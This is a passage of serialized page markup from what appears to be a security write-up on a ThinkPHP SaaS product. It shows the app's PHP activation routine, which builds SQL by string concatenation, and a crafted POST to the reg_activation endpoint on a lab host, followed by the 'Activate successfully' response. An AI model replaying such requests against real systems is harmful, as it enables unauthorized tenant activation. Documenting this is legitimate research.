51001],{"class":1375,"line":4806},[1373,50984,7362],{"class":1383},[1373,50986,50432],{"class":4640},[1373,50988,54
17],{"class":1397},[1373,50990,4656],{"class":1383},[1373,50992,50517],{"class":4640},[1373,50994,7035],{"class":1383},[1373,50996,1388],{"class":1387},[1373,50998,47076],{"class":1391},[1373,51000,1388],{"class":1387},[1373,51002,34699],{"class":1383},[1373,51004,51005,51007,51009,51011,51013,51015,51017,51019,51021,51023],{"class":1375,"line":4817},[1373,51006,7362],{"class":1383},[1373,51008,50687],{"class":4640},[1373,51010,5417],{"class":1397},[1373,51012,4656],{"class":1383},[1373,51014,50517],{"class":4640},[1373,51016,7035],{"class":1383},[1373,51018,1388],{"class":1387},[1373,51020,46826],{"class":1391},[1373,51022,1388],{"class":1387},[1373,51024,34699],{"class":1383},[1373,51026,51027,51029,51032,51034,51036,51038,51040,51042,51045,51047],{"class":1375,"line":4825},[1373,51028,7362],{"class":1383},[1373,51030,51031],{"class":4640},"dbName ",[1373,51033,5417],{"class":1397},[1373,51035,4656],{"class":1383},[1373,51037,50517],{"class":4640},[1373,51039,7035],{"class":1383},[1373,51041,1388],{"class":1387},[1373,51043,51044],{"class":1391},"saas_dbname",[1373,51046,1388],{"class":1387},[1373,51048,34699],{"class":1383},[1373,51050,51051,51053,51056,51058,51060,51062,51064,51066,51068,51070],{"class":1375,"line":4835},[1373,51052,7362],{"class":1383},[1373,51054,51055],{"class":4640},"adminPassword ",[1373,51057,5417],{"class":1397},[1373,51059,4656],{"class":1383},[1373,51061,50517],{"class":4640},[1373,51063,7035],{"class":1383},[1373,51065,1388],{"class":1387},[1373,51067,47000],{"class":1391},[1373,51069,1388],{"class":1387},[1373,51071,34699],{"class":1383},[1373,51073,51074,51076,51079,51081,51083,51085,51087,51089,51092,51094,51096],{"class":1375,"line":4843},[1373,51075,7362],{"class":1383},[1373,51077,51078],{"class":4640},"installDate 
",[1373,51080,5417],{"class":1397},[1373,51082,4656],{"class":1383},[1373,51084,50517],{"class":4640},[1373,51086,7035],{"class":1383},[1373,51088,1388],{"class":1387},[1373,51090,51091],{"class":1391},"saas_installdate",[1373,51093,1388],{"class":1387},[1373,51095,15050],{"class":1383},[1373,51097,47289],{"class":1383},[1373,51099,51100],{"class":1375,"line":4849},[1373,51101,47181],{"class":4640},[1373,51103,51104,51106,51108,51110,51112,51114],{"class":1375,"line":4877},[1373,51105,4695],{"class":4636},[1373,51107,4641],{"class":1383},[1373,51109,16090],{"class":1397},[1373,51111,4656],{"class":1383},[1373,51113,50517],{"class":4640},[1373,51115,47430],{"class":1383},[1373,51117,51118,51120,51122],{"class":1375,"line":4915},[1373,51119,4918],{"class":4636},[1373,51121,16311],{"class":7054},[1373,51123,47289],{"class":1383},[1373,51125,51126],{"class":1375,"line":4931},[1373,51127,4795],{"class":1383},[1373,51129,51130],{"class":1375,"line":4947},[1373,51131,47181],{"class":4640},[1373,51133,51134],{"class":1375,"line":4952},[1373,51135,51136],{"class":4630},"    \u002F\u002F创建数据库\n",[1373,51138,51139,51141,51143,51145,51147,51149,51152,51154,51156],{"class":1375,"line":6776},[1373,51140,7362],{"class":1383},[1373,51142,47161],{"class":4640},[1373,51144,5417],{"class":1397},[1373,51146,35288],{"class":34505},[1373,51148,4667],{"class":1397},[1373,51150,51151],{"class":7297},"createDB",[1373,51153,34467],{"class":1383},[1373,51155,50517],{"class":4640},[1373,51157,4680],{"class":1383},[1373,51159,51160],{"class":1375,"line":6781},[1373,51161,47181],{"class":4640},[1373,51163,51164],{"class":1375,"line":7524},[1373,51165,51166],{"class":4630},"    
\u002F\u002F设置SAAS的服务关系\n",[1373,51168,51169,51171,51173,51175],{"class":1375,"line":7530},[1373,51170,4695],{"class":4636},[1373,51172,47425],{"class":1383},[1373,51174,47190],{"class":4640},[1373,51176,47430],{"class":1383},[1373,51178,51179,51181,51183,51185,51187,51189,51191,51194,51196],{"class":1375,"line":7546},[1373,51180,4727],{"class":1383},[1373,51182,47697],{"class":4640},[1373,51184,5417],{"class":1397},[1373,51186,47702],{"class":7297},[1373,51188,1384],{"class":1383},[1373,51190,1388],{"class":1387},[1373,51192,51193],{"class":1391},"Ms\u002Fserver",[1373,51195,1388],{"class":1387},[1373,51197,4680],{"class":1383},[1373,51199,51200,51202,51205,51207,51209,51211,51213,51215,51217,51219,51221,51223,51226,51228,51230,51232,51234,51236,51238],{"class":1375,"line":7571},[1373,51201,4727],{"class":1383},[1373,51203,51204],{"class":4640},"server ",[1373,51206,5417],{"class":1397},[1373,51208,4656],{"class":1383},[1373,51210,47367],{"class":4640},[1373,51212,4667],{"class":1397},[1373,51214,47926],{"class":7297},[1373,51216,1384],{"class":1383},[1373,51218,47234],{"class":1379},[1373,51220,1384],{"class":1383},[1373,51222,1388],{"class":1387},[1373,51224,51225],{"class":1391},"server_type",[1373,51227,1388],{"class":1387},[1373,51229,5437],{"class":1383},[1373,51231,353],{"class":5467},[1373,51233,27548],{"class":1383},[1373,51235,4667],{"class":1397},[1373,51237,47975],{"class":7297},[1373,51239,15603],{"class":1383},[1373,51241,51242],{"class":1375,"line":7598},[1373,51243,51244],{"class":4640},"        \n",[1373,51246,51247,51249,51251,51254],{"class":1375,"line":7615},[1373,51248,9773],{"class":4636},[1373,51250,47425],{"class":1383},[1373,51252,51253],{"class":4640},"server",[1373,51255,47430],{"class":1383},[1373,51257,51258,51260,51263,51265,51267,51269,51271,51273,51276,51278],{"class":1375,"line":7635},[1373,51259,47435],{"class":1383},[1373,51261,51262],{"class":4640},"serverId 
",[1373,51264,5417],{"class":1397},[1373,51266,4656],{"class":1383},[1373,51268,51253],{"class":4640},[1373,51270,7035],{"class":1383},[1373,51272,1388],{"class":1387},[1373,51274,51275],{"class":1391},"server_id",[1373,51277,1388],{"class":1387},[1373,51279,34699],{"class":1383},[1373,51281,51282,51284,51287,51289,51291,51294,51296,51298,51301,51303,51305,51307,51310,51312,51314,51316,51318,51321,51324,51326],{"class":1375,"line":7640},[1373,51283,47435],{"class":1383},[1373,51285,51286],{"class":4640},"sql ",[1373,51288,5417],{"class":1397},[1373,51290,4883],{"class":1387},[1373,51292,51293],{"class":1391}," insert into sys_saas_server(gid,saas_id,login_server_id,server_is_mast) values('",[1373,51295,183],{"class":1387},[1373,51297,1398],{"class":1397},[1373,51299,51300],{"class":7297}," sp_get_guid",[1373,51302,7514],{"class":1383},[1373,51304,59],{"class":1397},[1373,51306,4883],{"class":1387},[1373,51308,51309],{"class":1391},"','",[1373,51311,4644],{"class":1383},[1373,51313,47250],{"class":4640},[1373,51315,51309],{"class":1391},[1373,51317,4644],{"class":1383},[1373,51319,51320],{"class":4640},"serverId",[1373,51322,51323],{"class":1391},"',1)",[1373,51325,183],{"class":1387},[1373,51327,47289],{"class":1383},[1373,51329,51330,51332,51334,51336,51339,51341,51344,51346,51348],{"class":1375,"line":7648},[1373,51331,47435],{"class":1383},[1373,51333,47367],{"class":4640},[1373,51335,4667],{"class":1397},[1373,51337,51338],{"class":4640},"db",[1373,51340,4667],{"class":1397},[1373,51342,51343],{"class":7297},"execute",[1373,51345,34467],{"class":1383},[1373,51347,5374],{"class":4640},[1373,51349,4680],{"class":1383},[1373,51351,51352],{"class":1375,"line":7672},[1373,51353,9861],{"class":1383},[1373,51355,51356],{"class":1375,"line":7688},[1373,51357,4795],{"class":1383},[1373,51359,51360],{"class":1375,"line":7709},[1373,51361,47181],{"class":4640},[1373,51363,51364],{"class":1375,"line":7714},[1373,51365,51366],{"class":4630},"    
\u002F\u002F更新状态\n",[1373,51368,51369,51371,51373,51375,51377,51379,51381,51383,51385,51387],{"class":1375,"line":7722},[1373,51370,7362],{"class":1383},[1373,51372,9156],{"class":4640},[1373,51374,7035],{"class":1383},[1373,51376,1388],{"class":1387},[1373,51378,47849],{"class":1391},[1373,51380,1388],{"class":1387},[1373,51382,15050],{"class":1383},[1373,51384,8575],{"class":1397},[1373,51386,5468],{"class":5467},[1373,51388,47289],{"class":1383},[1373,51390,51391,51393,51395,51397,51399,51401,51403,51405,51407,51409,51411],{"class":1375,"line":9903},[1373,51392,7362],{"class":1383},[1373,51394,9156],{"class":4640},[1373,51396,7035],{"class":1383},[1373,51398,1388],{"class":1387},[1373,51400,47076],{"class":1391},[1373,51402,1388],{"class":1387},[1373,51404,15050],{"class":1383},[1373,51406,8575],{"class":1397},[1373,51408,4656],{"class":1383},[1373,51410,50432],{"class":4640},[1373,51412,4912],{"class":1383},[1373,51414,51415,51417,51419,51421,51423,51426],{"class":1375,"line":9908},[1373,51416,4695],{"class":4636},[1373,51418,4641],{"class":1383},[1373,51420,16090],{"class":1397},[1373,51422,4656],{"class":1383},[1373,51424,51425],{"class":4640},"installDate",[1373,51427,47430],{"class":1383},[1373,51429,51430,51432,51434,51436,51438,51440,51442,51444,51446,51449,51451,51453,51455,51457,51459,51461,51464],{"class":1375,"line":9913},[1373,51431,4727],{"class":1383},[1373,51433,9156],{"class":4640},[1373,51435,7035],{"class":1383},[1373,51437,1388],{"class":1387},[1373,51439,51091],{"class":1391},[1373,51441,1388],{"class":1387},[1373,51443,15050],{"class":1383},[1373,51445,8575],{"class":1397},[1373,51447,51448],{"class":47982}," 
\\",[1373,51450,47986],{"class":9383},[1373,51452,47989],{"class":47982},[1373,51454,47992],{"class":9383},[1373,51456,47989],{"class":47982},[1373,51458,47997],{"class":9165},[1373,51460,48000],{"class":1397},[1373,51462,51463],{"class":7297},"getTryCode",[1373,51465,15603],{"class":1383},[1373,51467,51468,51470,51472,51474,51476,51479,51481,51483,51485,51487,51489,51491,51493,51495,51497,51499,51502,51504,51506],{"class":1375,"line":9932},[1373,51469,4727],{"class":1383},[1373,51471,9156],{"class":4640},[1373,51473,7035],{"class":1383},[1373,51475,1388],{"class":1387},[1373,51477,51478],{"class":1391},"auth_numbers",[1373,51480,1388],{"class":1387},[1373,51482,15050],{"class":1383},[1373,51484,8575],{"class":1397},[1373,51486,51448],{"class":47982},[1373,51488,47986],{"class":9383},[1373,51490,47989],{"class":47982},[1373,51492,47992],{"class":9383},[1373,51494,47989],{"class":47982},[1373,51496,47997],{"class":9165},[1373,51498,48000],{"class":1397},[1373,51500,51501],{"class":7297},"encrypt",[1373,51503,1384],{"class":1383},[1373,51505,48192],{"class":5467},[1373,51507,4680],{"class":1383},[1373,51509,51510,51512,51514,51516,51518,51521,51523,51525,51527,51529,51531,51533,51535,51537,51539,51541,51543,51545,51548,51550,51553,51555,51557,51560,51562,51564,51566,51568,51570,51573,51575],{"class":1375,"line":9937},[1373,51511,4727],{"class":1383},[1373,51513,9156],{"class":4640},[1373,51515,7035],{"class":1383},[1373,51517,1388],{"class":1387},[1373,51519,51520],{"class":1391},"auth_expiredate",[1373,51522,1388],{"class":1387},[1373,51524,15050],{"class":1383},[1373,51526,8575],{"class":1397},[1373,51528,51448],{"class":47982},[1373,51530,47986],{"class":9383},[1373,51532,47989],{"class":47982},[1373,51534,47992],{"class":9383},[1373,51536,47989],{"class":47982},[1373,51538,47997],{"class":9165},[1373,51540,48000],{"class":1397},[1373,51542,51501],{"class":7297},[1373,51544,1384],{"class":1383},[1373,51546,51547],{"class":1379},"strtotime",[1373,51549,1384],{"class
":1383},[1373,51551,51552],{"class":1379},"date",[1373,51554,1384],{"class":1383},[1373,51556,1388],{"class":1387},[1373,51558,51559],{"class":1391},"Y-m-d H:i:s",[1373,51561,1388],{"class":1387},[1373,51563,5437],{"class":1383},[1373,51565,51547],{"class":1379},[1373,51567,1384],{"class":1383},[1373,51569,1388],{"class":1387},[1373,51571,51572],{"class":1391},"+15 day",[1373,51574,1388],{"class":1387},[1373,51576,51577],{"class":1383},"))));\n",[1373,51579,51580],{"class":1375,"line":9957},[1373,51581,4795],{"class":1383},[1373,51583,51584,51586,51588,51591,51593,51595],{"class":1375,"line":9962},[1373,51585,50072],{"class":34505},[1373,51587,4667],{"class":1397},[1373,51589,51590],{"class":7297},"save",[1373,51592,34467],{"class":1383},[1373,51594,9156],{"class":4640},[1373,51596,4680],{"class":1383},[1373,51598,51599],{"class":1375,"line":15955},[1373,51600,47181],{"class":4640},[1373,51602,51603],{"class":1375,"line":16030},[1373,51604,51605],{"class":4630},"    \u002F\u002F发送邮件通知\n",[1373,51607,51608,51610,51612,51614,51616,51619],{"class":1375,"line":16035},[1373,51609,4695],{"class":4636},[1373,51611,4641],{"class":1383},[1373,51613,34506],{"class":34505},[1373,51615,4667],{"class":1397},[1373,51617,51618],{"class":4640},"is_send_activation_email",[1373,51620,47430],{"class":1383},[1373,51622,51623,51625,51627,51630,51632,51634],{"class":1375,"line":16083},[1373,51624,47549],{"class":34505},[1373,51626,4667],{"class":1397},[1373,51628,51629],{"class":7297},"sendMailNotify",[1373,51631,34467],{"class":1383},[1373,51633,50517],{"class":4640},[1373,51635,4680],{"class":1383},[1373,51637,51638],{"class":1375,"line":16098},[1373,51639,4795],{"class":1383},[1373,51641,51642],{"class":1375,"line":16103},[1373,51643,47181],{"class":4640},[1373,51645,51646],{"class":1375,"line":16147},[1373,51647,47181],{"class":4640},[1373,51649,51650,51652,51654],{"class":1375,"line":16153},[1373,51651,7340],{"class":4636},[1373,51653,14986],{"class":7054},[1373,51655,47289],{"class
":1383},[1373,51657,51658],{"class":1375,"line":16164},[1373,51659,47181],{"class":4640},[1373,51661,51662],{"class":1375,"line":16170},[1373,51663,1855],{"class":1383},[18,51665,51666],{},"This successfully activates the SaaS organization and sets up the organization with the data we initially registered with. Time to test the activation of our initial organization:",[1354,51668,51670],{"className":8228,"code":51669,"language":8230,"meta":219,"style":219},"POST \u002Findex.php\u002FHome\u002FSaas\u002Freg_activation HTTP\u002F1.1\nHost: 10.0.0.104:8000\nContent-Length: 44\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 Safari\u002F537.36\nCookie: PHPSESSID=5q37l00e0alpb5euu40403tj3e;\nConnection: keep-alive\n\nsaas_id=1438134D-4ECD-9FBC-CE77-8EF6C37F47DE\n",[886,51671,51672,51677,51681,51686,51691,51695,51700,51704,51708],{"__ignoreMap":219},[1373,51673,51674],{"class":1375,"line":1376},[1373,51675,51676],{"class":4640},"POST \u002Findex.php\u002FHome\u002FSaas\u002Freg_activation HTTP\u002F1.1\n",[1373,51678,51679],{"class":1375,"line":220},[1373,51680,50316],{"class":4640},[1373,51682,51683],{"class":1375,"line":1266},[1373,51684,51685],{"class":4640},"Content-Length: 44\n",[1373,51687,51688],{"class":1375,"line":1852},[1373,51689,51690],{"class":4640},"Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,51692,51693],{"class":1375,"line":4692},[1373,51694,50331],{"class":4640},[1373,51696,51697],{"class":1375,"line":4724},[1373,51698,51699],{"class":4640},"Cookie: 
PHPSESSID=5q37l00e0alpb5euu40403tj3e;\n",[1373,51701,51702],{"class":1375,"line":4756},[1373,51703,50346],{"class":4640},[1373,51705,51706],{"class":1375,"line":4768},[1373,51707,6520],{"emptyLinePlaceholder":237},[1373,51709,51710],{"class":1375,"line":4792},[1373,51711,51712],{"class":4640},"saas_id=1438134D-4ECD-9FBC-CE77-8EF6C37F47DE\n",[18,51714,51715],{},"The server then responds with a \"Activate successfully\" and a little smiley face:",[1354,51717,51719],{"className":8228,"code":51718,"language":8230,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nDate: Thu, 09 Jan 2025 19:52:29 GMT\nServer: Apache\u002F2.4.46 (Win32) OpenSSL\u002F1.1.1g PHP\u002F7.4.14\nX-Powered-By: ThinkPHP\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: private\nPragma: no-cache\nContent-Length: 1655\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE html PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\" \"http:\u002F\u002Fwww.w3.org\u002FTR\u002Fxhtml1\u002FDTD\u002Fxhtml1-transitional.dtd\">\n\u003Chtml xmlns=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002Fxhtml\">\n\u003Chead>\n\u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml; charset=utf-8\" \u002F>\n\u003Ctitle>跳转提示\u003C\u002Ftitle>\n\u003Cstyle type=\"text\u002Fcss\">\n*{ padding: 0; margin: 0; }\nbody{ background: #fff; font-family: '微软雅黑'; color: #333; font-size: 16px; }\n.system-message{ padding: 24px 48px; }\n.system-message h1{ font-size: 100px; font-weight: normal; line-height: 120px; margin-bottom: 12px; }\n.system-message .jump{ padding-top: 10px}\n.system-message .jump a{ color: #333;}\n.system-message .success,.system-message .error{ line-height: 1.8em; font-size: 36px }\n.system-message .detail{ font-size: 12px; line-height: 20px; margin-top: 12px; display:none}\n\u003C\u002Fstyle>\n\u003Cmeta name=\"__hash__\" content=\"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c\" 
\u002F>\u003Cmeta name=\"__hash__\" content=\"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c\" \u002F>\u003C\u002Fhead>\n\u003Cbody>\n\u003Cdiv class=\"system-message\">\n\u003Ch1>:)\u003C\u002Fh1>\n\u003Cp class=\"success\">Activate successfully\u003C\u002Fp>\n\u003Cp class=\"detail\">\u003C\u002Fp>\n\u003Cp class=\"jump\">\n\n",[886,51720,51721,51726,51731,51736,51741,51746,51751,51756,51761,51766,51771,51776,51780,51799,51819,51827,51858,51876,51894,51922,51982,52010,52069,52093,52119,52163,52217,52225,52285,52293,52311,52328,52355,52377],{"__ignoreMap":219},[1373,51722,51723],{"class":1375,"line":1376},[1373,51724,51725],{"class":4640},"HTTP\u002F1.1 200 OK\n",[1373,51727,51728],{"class":1375,"line":220},[1373,51729,51730],{"class":4640},"Date: Thu, 09 Jan 2025 19:52:29 GMT\n",[1373,51732,51733],{"class":1375,"line":1266},[1373,51734,51735],{"class":4640},"Server: Apache\u002F2.4.46 (Win32) OpenSSL\u002F1.1.1g PHP\u002F7.4.14\n",[1373,51737,51738],{"class":1375,"line":1852},[1373,51739,51740],{"class":4640},"X-Powered-By: ThinkPHP\n",[1373,51742,51743],{"class":1375,"line":4692},[1373,51744,51745],{"class":4640},"Expires: Thu, 19 Nov 1981 08:52:00 GMT\n",[1373,51747,51748],{"class":1375,"line":4724},[1373,51749,51750],{"class":4640},"Cache-Control: private\n",[1373,51752,51753],{"class":1375,"line":4756},[1373,51754,51755],{"class":4640},"Pragma: no-cache\n",[1373,51757,51758],{"class":1375,"line":4768},[1373,51759,51760],{"class":4640},"Content-Length: 1655\n",[1373,51762,51763],{"class":1375,"line":4792},[1373,51764,51765],{"class":4640},"Keep-Alive: timeout=5, max=100\n",[1373,51767,51768],{"class":1375,"line":4798},[1373,51769,51770],{"class":4640},"Connection: Keep-Alive\n",[1373,51772,51773],{"class":1375,"line":4806},[1373,51774,51775],{"class":4640},"Content-Type: text\u002Fhtml; 
charset=utf-8\n",[1373,51777,51778],{"class":1375,"line":4817},[1373,51779,6520],{"emptyLinePlaceholder":237},[1373,51781,51782,51784,51786,51788,51791,51794,51797],{"class":1375,"line":4825},[1373,51783,6755],{"class":1383},[1373,51785,6758],{"class":6300},[1373,51787,6762],{"class":8252},[1373,51789,51790],{"class":8252}," PUBLIC",[1373,51792,51793],{"class":1391}," \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\"",[1373,51795,51796],{"class":1391}," \"http:\u002F\u002Fwww.w3.org\u002FTR\u002Fxhtml1\u002FDTD\u002Fxhtml1-transitional.dtd\"",[1373,51798,6765],{"class":1383},[1373,51800,51801,51803,51805,51808,51810,51812,51815,51817],{"class":1375,"line":4835},[1373,51802,11852],{"class":1383},[1373,51804,8230],{"class":6300},[1373,51806,51807],{"class":8252}," xmlns",[1373,51809,5417],{"class":1383},[1373,51811,183],{"class":1387},[1373,51813,51814],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F1999\u002Fxhtml",[1373,51816,183],{"class":1387},[1373,51818,6765],{"class":1383},[1373,51820,51821,51823,51825],{"class":1375,"line":4843},[1373,51822,11852],{"class":1383},[1373,51824,48974],{"class":6300},[1373,51826,6765],{"class":1383},[1373,51828,51829,51831,51833,51836,51838,51840,51842,51844,51847,51849,51851,51854,51856],{"class":1375,"line":4849},[1373,51830,11852],{"class":1383},[1373,51832,48983],{"class":6300},[1373,51834,51835],{"class":8252}," http-equiv",[1373,51837,5417],{"class":1383},[1373,51839,183],{"class":1387},[1373,51841,6391],{"class":1391},[1373,51843,183],{"class":1387},[1373,51845,51846],{"class":8252}," content",[1373,51848,5417],{"class":1383},[1373,51850,183],{"class":1387},[1373,51852,51853],{"class":1391},"text\u002Fhtml; 
charset=utf-8",[1373,51855,183],{"class":1387},[1373,51857,46508],{"class":1383},[1373,51859,51860,51862,51865,51867,51870,51872,51874],{"class":1375,"line":4877},[1373,51861,11852],{"class":1383},[1373,51863,51864],{"class":6300},"title",[1373,51866,5384],{"class":1383},[1373,51868,51869],{"class":4640},"跳转提示",[1373,51871,46627],{"class":1383},[1373,51873,51864],{"class":6300},[1373,51875,6765],{"class":1383},[1373,51877,51878,51880,51882,51884,51886,51888,51890,51892],{"class":1375,"line":4915},[1373,51879,11852],{"class":1383},[1373,51881,2901],{"class":6300},[1373,51883,8253],{"class":8252},[1373,51885,5417],{"class":1383},[1373,51887,183],{"class":1387},[1373,51889,49066],{"class":1391},[1373,51891,183],{"class":1387},[1373,51893,6765],{"class":1383},[1373,51895,51896,51899,51901,51905,51907,51909,51911,51914,51916,51918,51920],{"class":1375,"line":4931},[1373,51897,35613],{"class":51898},"sn17v",[1373,51900,9149],{"class":1383},[1373,51902,51904],{"class":51903},"sfFRu"," padding",[1373,51906,4606],{"class":1383},[1373,51908,5557],{"class":5467},[1373,51910,39663],{"class":1383},[1373,51912,51913],{"class":51903}," margin",[1373,51915,4606],{"class":1383},[1373,51917,5557],{"class":5467},[1373,51919,39663],{"class":1383},[1373,51921,35334],{"class":1383},[1373,51923,51924,51926,51928,51931,51933,51936,51939,51941,51944,51946,51948,51951,51953,51955,51958,51960,51962,51965,51967,51970,51972,51975,51978,51980],{"class":1375,"line":4947},[1373,51925,20718],{"class":51898},[1373,51927,9149],{"class":1383},[1373,51929,51930],{"class":51903}," background",[1373,51932,4606],{"class":1383},[1373,51934,51935],{"class":7054}," #",[1373,51937,51938],{"class":2326},"fff",[1373,51940,39663],{"class":1383},[1373,51942,51943],{"class":51903}," font-family",[1373,51945,4606],{"class":1383},[1373,51947,4713],{"class":1387},[1373,51949,51950],{"class":1391},"微软雅黑",[1373,51952,1388],{"class":1387},[1373,51954,39663],{"class":1383},[1373,51956,51957],{"class":51903}," 
color",[1373,51959,4606],{"class":1383},[1373,51961,51935],{"class":7054},[1373,51963,51964],{"class":2326},"333",[1373,51966,39663],{"class":1383},[1373,51968,51969],{"class":51903}," font-size",[1373,51971,4606],{"class":1383},[1373,51973,51974],{"class":5467}," 16",[1373,51976,51977],{"class":5387},"px",[1373,51979,39663],{"class":1383},[1373,51981,35334],{"class":1383},[1373,51983,51984,51987,51990,51992,51994,51996,51999,52001,52004,52006,52008],{"class":1375,"line":4952},[1373,51985,59],{"class":51986},"sRsjY",[1373,51988,51989],{"class":2206},"system-message",[1373,51991,9149],{"class":1383},[1373,51993,51904],{"class":51903},[1373,51995,4606],{"class":1383},[1373,51997,51998],{"class":5467}," 24",[1373,52000,51977],{"class":5387},[1373,52002,52003],{"class":5467}," 48",[1373,52005,51977],{"class":5387},[1373,52007,39663],{"class":1383},[1373,52009,35334],{"class":1383},[1373,52011,52012,52014,52016,52019,52021,52023,52025,52028,52030,52032,52035,52037,52041,52043,52046,52048,52051,52053,52055,52058,52060,52063,52065,52067],{"class":1375,"line":6776},[1373,52013,59],{"class":51986},[1373,52015,51989],{"class":2206},[1373,52017,52018],{"class":51898}," h1",[1373,52020,9149],{"class":1383},[1373,52022,51969],{"class":51903},[1373,52024,4606],{"class":1383},[1373,52026,52027],{"class":5467}," 100",[1373,52029,51977],{"class":5387},[1373,52031,39663],{"class":1383},[1373,52033,52034],{"class":51903}," font-weight",[1373,52036,4606],{"class":1383},[1373,52038,52040],{"class":52039},"s9BUQ"," normal",[1373,52042,39663],{"class":1383},[1373,52044,52045],{"class":51903}," line-height",[1373,52047,4606],{"class":1383},[1373,52049,52050],{"class":5467}," 120",[1373,52052,51977],{"class":5387},[1373,52054,39663],{"class":1383},[1373,52056,52057],{"class":51903}," margin-bottom",[1373,52059,4606],{"class":1383},[1373,52061,52062],{"class":5467}," 
12",[1373,52064,51977],{"class":5387},[1373,52066,39663],{"class":1383},[1373,52068,35334],{"class":1383},[1373,52070,52071,52073,52075,52077,52080,52082,52085,52087,52089,52091],{"class":1375,"line":6781},[1373,52072,59],{"class":51986},[1373,52074,51989],{"class":2206},[1373,52076,1398],{"class":51986},[1373,52078,52079],{"class":2206},"jump",[1373,52081,9149],{"class":1383},[1373,52083,52084],{"class":51903}," padding-top",[1373,52086,4606],{"class":1383},[1373,52088,39673],{"class":5467},[1373,52090,51977],{"class":5387},[1373,52092,1855],{"class":1383},[1373,52094,52095,52097,52099,52101,52103,52106,52108,52110,52112,52114,52116],{"class":1375,"line":7524},[1373,52096,59],{"class":51986},[1373,52098,51989],{"class":2206},[1373,52100,1398],{"class":51986},[1373,52102,52079],{"class":2206},[1373,52104,52105],{"class":51898}," a",[1373,52107,9149],{"class":1383},[1373,52109,51957],{"class":51903},[1373,52111,4606],{"class":1383},[1373,52113,51935],{"class":7054},[1373,52115,51964],{"class":2326},[1373,52117,52118],{"class":1383},";}\n",[1373,52120,52121,52123,52125,52127,52129,52131,52133,52135,52137,52139,52141,52143,52145,52148,52150,52152,52154,52156,52159,52161],{"class":1375,"line":7530},[1373,52122,59],{"class":51986},[1373,52124,51989],{"class":2206},[1373,52126,1398],{"class":51986},[1373,52128,16142],{"class":2206},[1373,52130,5437],{"class":1383},[1373,52132,59],{"class":51986},[1373,52134,51989],{"class":2206},[1373,52136,1398],{"class":51986},[1373,52138,10265],{"class":2206},[1373,52140,9149],{"class":1383},[1373,52142,52045],{"class":51903},[1373,52144,4606],{"class":1383},[1373,52146,52147],{"class":5467}," 1.8",[1373,52149,1131],{"class":5387},[1373,52151,39663],{"class":1383},[1373,52153,51969],{"class":51903},[1373,52155,4606],{"class":1383},[1373,52157,52158],{"class":5467}," 
36",[1373,52160,51977],{"class":5387},[1373,52162,35334],{"class":1383},[1373,52164,52165,52167,52169,52171,52174,52176,52178,52180,52182,52184,52186,52188,52190,52193,52195,52197,52200,52202,52204,52206,52208,52211,52213,52215],{"class":1375,"line":7546},[1373,52166,59],{"class":51986},[1373,52168,51989],{"class":2206},[1373,52170,1398],{"class":51986},[1373,52172,52173],{"class":2206},"detail",[1373,52175,9149],{"class":1383},[1373,52177,51969],{"class":51903},[1373,52179,4606],{"class":1383},[1373,52181,52062],{"class":5467},[1373,52183,51977],{"class":5387},[1373,52185,39663],{"class":1383},[1373,52187,52045],{"class":51903},[1373,52189,4606],{"class":1383},[1373,52191,52192],{"class":5467}," 20",[1373,52194,51977],{"class":5387},[1373,52196,39663],{"class":1383},[1373,52198,52199],{"class":51903}," margin-top",[1373,52201,4606],{"class":1383},[1373,52203,52062],{"class":5467},[1373,52205,51977],{"class":5387},[1373,52207,39663],{"class":1383},[1373,52209,52210],{"class":51903}," display",[1373,52212,4606],{"class":1383},[1373,52214,5079],{"class":52039},[1373,52216,1855],{"class":1383},[1373,52218,52219,52221,52223],{"class":1375,"line":7571},[1373,52220,46627],{"class":1383},[1373,52222,2901],{"class":6300},[1373,52224,6765],{"class":1383},[1373,52226,52227,52229,52231,52233,52235,52237,52240,52242,52244,52246,52248,52251,52253,52256,52258,52260,52262,52264,52266,52268,52270,52272,52274,52276,52278,52281,52283],{"class":1375,"line":7598},[1373,52228,11852],{"class":1383},[1373,52230,48983],{"class":6300},[1373,52232,46496],{"class":8252},[1373,52234,5417],{"class":1383},[1373,52236,183],{"class":1387},[1373,52238,52239],{"class":1391},"__hash__",[1373,52241,183],{"class":1387},[1373,52243,51846],{"class":8252},[1373,52245,5417],{"class":1383},[1373,52247,183],{"class":1387},[1373,52249,52250],{"class":1391},"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c",[1373,52252,183],{"class":1387},[1373,52254,52255],{"class":1383}," 
\u002F>\u003C",[1373,52257,48983],{"class":6300},[1373,52259,46496],{"class":8252},[1373,52261,5417],{"class":1383},[1373,52263,183],{"class":1387},[1373,52265,52239],{"class":1391},[1373,52267,183],{"class":1387},[1373,52269,51846],{"class":8252},[1373,52271,5417],{"class":1383},[1373,52273,183],{"class":1387},[1373,52275,52250],{"class":1391},[1373,52277,183],{"class":1387},[1373,52279,52280],{"class":1383}," 